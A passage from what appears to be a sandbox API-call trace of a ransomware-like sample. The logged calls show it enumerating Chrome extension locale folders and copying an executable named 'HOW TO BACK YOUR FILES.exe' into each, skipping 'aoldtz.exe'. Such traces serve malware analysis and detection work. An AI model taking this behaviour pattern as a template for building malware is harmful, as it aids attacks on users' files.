dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.861] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.861] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" [0104.861] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" [0104.861] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.862] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.862] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.862] GetLastError () returned 0x0 [0104.862] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.863] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.863] CloseHandle (hObject=0x120) returned 1 [0104.863] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.863] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8344a920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d765540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d765540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.863] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.863] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.863] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" [0104.863] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" [0104.863] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.863] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.864] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.864] GetLastError () returned 0x0 [0104.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.864] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.864] CloseHandle (hObject=0x120) returned 1 [0104.865] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8343bec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d78b6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d78b6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.865] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.865] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.865] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" [0104.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" [0104.865] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.865] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.866] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.866] GetLastError () returned 0x0 [0104.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.866] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.866] CloseHandle (hObject=0x120) returned 1 [0104.866] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.866] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83434990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d78b6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d78b6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.866] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.867] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.867] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" [0104.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" [0104.867] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.867] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.867] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.868] GetLastError () returned 0x0 [0104.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.868] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.868] CloseHandle (hObject=0x120) returned 1 [0104.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8342d460, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d78b6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d78b6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.868] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.868] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.868] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" [0104.869] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" [0104.869] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.869] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.869] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.870] GetLastError () returned 0x0 [0104.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.870] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.870] CloseHandle (hObject=0x120) returned 1 [0104.870] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83425f30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7b1800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7b1800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.870] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.870] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.870] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" [0104.870] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" [0104.870] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.870] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.871] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.871] GetLastError () returned 0x0 [0104.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.871] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.871] CloseHandle (hObject=0x120) returned 1 [0104.872] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.872] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83419be0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7d7960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7d7960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.872] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.872] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.872] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" [0104.872] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" [0104.872] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.872] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.873] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.874] GetLastError () returned 0x0 [0104.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.874] ReadFile (in: hFile=0x120, 